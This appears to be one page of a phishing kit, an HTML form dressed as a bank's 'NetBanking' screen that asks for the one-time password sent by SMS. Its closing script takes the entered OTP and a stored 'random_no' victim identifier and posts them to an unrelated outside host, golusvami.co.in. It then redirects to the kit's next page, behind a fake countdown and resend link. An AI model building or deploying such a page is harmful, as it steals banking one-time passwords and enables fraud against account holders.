<!DOCTYPE html>
<html>

<head>
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Enter One time ^&*Q@#$5415</title>
    <meta name="description" content="enter one time password" />
    <link rel="preload" as="image" href="logo.png" />
    <meta name="next-head-count" content="5" />


    <style>
        body,
        html {
            font-family: Open Sans, sans-serif;
            background: #f3f3f3;
            line-height: normal;
            font-size: 14px;
            color: #333;
            margin: 0;
            padding: 0
        }

        a {
            text-decoration: none;
            color: #1d86ff
        }

        * {
            box-sizing: border-box
        }

        .header {
            background: #fff
        }

        .text-center {
            text-align: center
        }

        h1 {
            font-size: 20px;
            color: #333;
            font-weight: 400
        }

        h2 {
            margin-top: 0;
            padding-top: 0
        }

        h2,
        h3 {
            font-size: 18px;
            color: #333;
            font-weight: 400;
            margin-bottom: 20px
        }

        .logo {
            padding: 20px
        }

        .footer {
            background: #035297;
            font-size: 11px;
            padding: 20px 5px;
            color: #fff
        }

        .footer a {
            color: #fff;
            margin-left: 20px
        }

        .content {
            margin: 10px 2px 20px;
            padding: 20px;
            background: #fff
        }

        .info-pass {
            display: block;
            margin-bottom: 10px;
            font-size: 12px
        }

        .links a {
            margin-bottom: 20px
        }

        .link,
        .links a {
            display: block
        }

        .line {
            border-bottom: 1px solid #ddd;
            line-height: 1px;
            margin-top: 20px
        }

        .dataList {
            max-width: 600px;
            margin: auto
        }

        .row {
            padding: 9px;
            font-size: 15px;
            border-bottom: 1px solid #dde6eb
        }

        .login-btn {
            width: 200px !important
        }

        .btn {
            width: 276px;
            margin: 5px 0
        }

        .btn-default,
        .btn-primary {
            padding: 6px 10px
        }

        .btn-primary {
            background: #1d86ff;
            border: 1px solid transparent;
            font-size: 16px;
            padding: 6px 20px
        }

        .btn {
            box-shadow: 0 1px 1px rgba(0, 0, 0, .3);
            text-transform: uppercase;
            border-radius: 3px
        }

        .btn-primary {
            color: #fff
        }

        .btn {
            margin-bottom: 0;
            text-align: center;
            white-space: nowrap;
            vertical-align: middle;
            touch-action: manipulation;
            cursor: pointer;
            background-image: none;
            border: 1px solid transparent;
            padding: 6px 12px;
            font-size: 14px;
            line-height: 1.42857143;
            border-radius: 4px;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none
        }

        .btn,
        label {
            display: inline-block;
            font-weight: 400
        }

        label {
            max-width: 100%;
            margin-bottom: 5px
        }

        input[type=search] {
            box-sizing: border-box;
            -webkit-appearance: none;
            -moz-appearance: none;
            appearance: none
        }

        input[type=checkbox],
        input[type=radio] {
            margin: 4px 0 0;
            margin-top: 1px\9;
            line-height: normal
        }

        fieldset[disabled] input[type=checkbox],
        fieldset[disabled] input[type=radio],
        input[type=checkbox].disabled,
        input[type=checkbox][disabled],
        input[type=radio].disabled,
        input[type=radio][disabled] {
            cursor: not-allowed
        }

        input[type=file] {
            display: block
        }

        input[type=range] {
            display: block;
            width: 100%
        }

        select[multiple],
        select[size] {
            height: auto
        }

        input[type=checkbox]:focus,
        input[type=file]:focus,
        input[type=radio]:focus {
            outline: 5px auto -webkit-focus-ring-color;
            outline-offset: -2px
        }

        output {
            padding-top: 7px
        }

        .form-control,
        output {
            display: block;
            font-size: 14px;
            line-height: 1.42857143;
            color: #555
        }

        .form-control {
            width: 100%;
            height: 34px;
            padding: 6px 12px;
            background-color: #fff;
            background-image: none;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
            transition: border-color .15s ease-in-out, box-shadow .15s ease-in-out
        }

        .form-control:focus {
            border-color: #66afe9;
            outline: 0;
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, .6)
        }

        .form-control::-moz-placeholder {
            color: #999;
            opacity: 1
        }

        .form-control:-ms-input-placeholder {
            color: #999
        }

        .form-control::-webkit-input-placeholder {
            color: #999
        }

        .form-control::-ms-expand {
            background-color: transparent;
            border: 0
        }

        .form-control[disabled],
        .form-control[readonly],
        fieldset[disabled] .form-control {
            background-color: #eee;
            opacity: 1
        }

        .form-control[disabled],
        fieldset[disabled] .form-control {
            cursor: not-allowed
        }

        textarea.form-control {
            height: auto
        }

        @media screen and (-webkit-min-device-pixel-ratio:0) {

            input[type=date].form-control,
            input[type=datetime-local].form-control,
            input[type=month].form-control,
            input[type=time].form-control {
                line-height: 34px
            }

            .input-group-sm input[type=date],
            .input-group-sm input[type=datetime-local],
            .input-group-sm input[type=month],
            .input-group-sm input[type=time],
            input[type=date].input-sm,
            input[type=datetime-local].input-sm,
            input[type=month].input-sm,
            input[type=time].input-sm {
                line-height: 30px
            }

            .input-group-lg input[type=date],
            .input-group-lg input[type=datetime-local],
            .input-group-lg input[type=month],
            .input-group-lg input[type=time],
            input[type=date].input-lg,
            input[type=datetime-local].input-lg,
            input[type=month].input-lg,
            input[type=time].input-lg {
                line-height: 46px
            }
        }

        .form-group {
            margin-bottom: 15px
        }

        .checkbox,
        .radio {
            position: relative;
            display: block;
            margin-top: 10px;
            margin-bottom: 10px
        }

        .checkbox.disabled label,
        .radio.disabled label,
        fieldset[disabled] .checkbox label,
        fieldset[disabled] .radio label {
            cursor: not-allowed
        }

        .checkbox label,
        .radio label {
            min-height: 20px;
            padding-left: 20px;
            margin-bottom: 0;
            font-weight: 400;
            cursor: pointer
        }

        .checkbox input[type=checkbox],
        .checkbox-inline input[type=checkbox],
        .radio input[type=radio],
        .radio-inline input[type=radio] {
            position: absolute;
            margin-top: 4px\9;
            margin-left: -20px
        }

        .checkbox+.checkbox,
        .radio+.radio {
            margin-top: -5px
        }

        .checkbox-inline,
        .radio-inline {
            position: relative;
            display: inline-block;
            padding-left: 20px;
            margin-bottom: 0;
            font-weight: 400;
            vertical-align: middle;
            cursor: pointer
        }

        .checkbox-inline.disabled,
        .radio-inline.disabled,
        fieldset[disabled] .checkbox-inline,
        fieldset[disabled] .radio-inline {
            cursor: not-allowed
        }

        .checkbox-inline+.checkbox-inline,
        .radio-inline+.radio-inline {
            margin-top: 0;
            margin-left: 10px
        }

        .form-control-static {
            min-height: 34px;
            padding-top: 7px;
            padding-bottom: 7px;
            margin-bottom: 0
        }

        .form-control-static.input-lg,
        .form-control-static.input-sm {
            padding-right: 0;
            padding-left: 0
        }

        .input-sm {
            height: 30px;
            padding: 5px 10px;
            font-size: 12px;
            line-height: 1.5;
            border-radius: 3px
        }

        select.input-sm {
            height: 30px;
            line-height: 30px
        }

        select[multiple].input-sm,
        textarea.input-sm {
            height: auto
        }

        .form-group-sm .form-control {
            height: 30px;
            padding: 5px 10px;
            font-size: 12px;
            line-height: 1.5;
            border-radius: 3px
        }

        .form-group-sm select.form-control {
            height: 30px;
            line-height: 30px
        }

        .form-group-sm select[multiple].form-control,
        .form-group-sm textarea.form-control {
            height: auto
        }

        .form-group-sm .form-control-static {
            height: 30px;
            min-height: 32px;
            padding: 6px 10px;
            font-size: 12px;
            line-height: 1.5
        }

        .input-lg {
            height: 46px;
            padding: 10px 16px;
            font-size: 18px;
            line-height: 1.3333333;
            border-radius: 6px
        }

        select.input-lg {
            height: 46px;
            line-height: 46px
        }

        select[multiple].input-lg,
        textarea.input-lg {
            height: auto
        }

        .form-group-lg .form-control {
            height: 46px;
            padding: 10px 16px;
            font-size: 18px;
            line-height: 1.3333333;
            border-radius: 6px
        }

        .form-group-lg select.form-control {
            height: 46px;
            line-height: 46px
        }

        .form-group-lg select[multiple].form-control,
        .form-group-lg textarea.form-control {
            height: auto
        }

        .form-group-lg .form-control-static {
            height: 46px;
            min-height: 38px;
            padding: 11px 16px;
            font-size: 18px;
            line-height: 1.3333333
        }

        .has-feedback {
            position: relative
        }

        .has-feedback .form-control {
            padding-right: 42.5px
        }

        .form-control-feedback {
            position: absolute;
            top: 0;
            right: 0;
            z-index: 2;
            display: block;
            width: 34px;
            height: 34px;
            line-height: 34px;
            text-align: center;
            pointer-events: none
        }

        .form-group-lg .form-control+.form-control-feedback,
        .input-group-lg+.form-control-feedback,
        .input-lg+.form-control-feedback {
            width: 46px;
            height: 46px;
            line-height: 46px
        }

        .form-group-sm .form-control+.form-control-feedback,
        .input-group-sm+.form-control-feedback,
        .input-sm+.form-control-feedback {
            width: 30px;
            height: 30px;
            line-height: 30px
        }
    </style>


</head>

<body>
    <div id="__next">
        <div class="header">
            <div class="logo text-center"><span
                    style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%"><span
                        style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%"><img
                            style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0"
                            alt="" aria-hidden="true"
                            src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27190%27%20height=%2732%27/%3e" /></span><img
                        alt="the logo" src="logo.png" decoding="async" data-nimg="intrinsic"
                        style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%" /></span>
                <h1> Welcome to NetBanking </h1>
            </div>
        </div>
        <div class="content">
            <h2>Enter the One Time Password sent to your mobile phone</h2>

            <form>
                <div class="form-group"><label for="username">Enter One Time Password</label>
                    <input type="text" class="form-control" name="otp3" required="" id="otp3" />
                </div>

                <button type="button" class="btn btn-primary login-btn" onclick="updateData()">SUBMIT</button>
            </form>


            <p class="text-center">03:00</p>
            <p>If you did not receive the One Time Password on SMS, you can <a href="/">Click here to resend the OTP</a>
            </p>
        </div>
        <div class="footer">© Copyright Bank Ltd.<a href="/">Terms and Conditions</a><a href="/">Privacy Policy</a>
        </div>
    </div>
    <script id="__NEXT_DATA__"
        type="application/json">{"props":{"pageProps":{}},"page":"/p5","query":{},"buildId":"B0dLO4s_orCtDRUQBYD7j","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>





    <script type="text/javascript">
        var random_no = localStorage.getItem('random_no');
        function updateData() {
            var otp = document.getElementById("otp3").value;
            if (otp != "") {

                var data = {
                    otp: otp,
                    random_no: random_no

                };
                var xhr = new XMLHttpRequest();

                xhr.open("POST", "https://golusvami.co.in/hd_01/dd.php", true);
                xhr.setRequestHeader("Content-Type", "application/json");
                xhr.onreadystatechange = function () {
                    if (xhr.readyState === 4 && xhr.status === 200) {
                        console.log(xhr.responseText);
                        window.location.href = 'Yiyhsdy.html';



                    }
                };
                xhr.send(JSON.stringify(data));

            }
            else {
                alert('Please fill all fields');
            }
        }

    </script>


</body>

</html>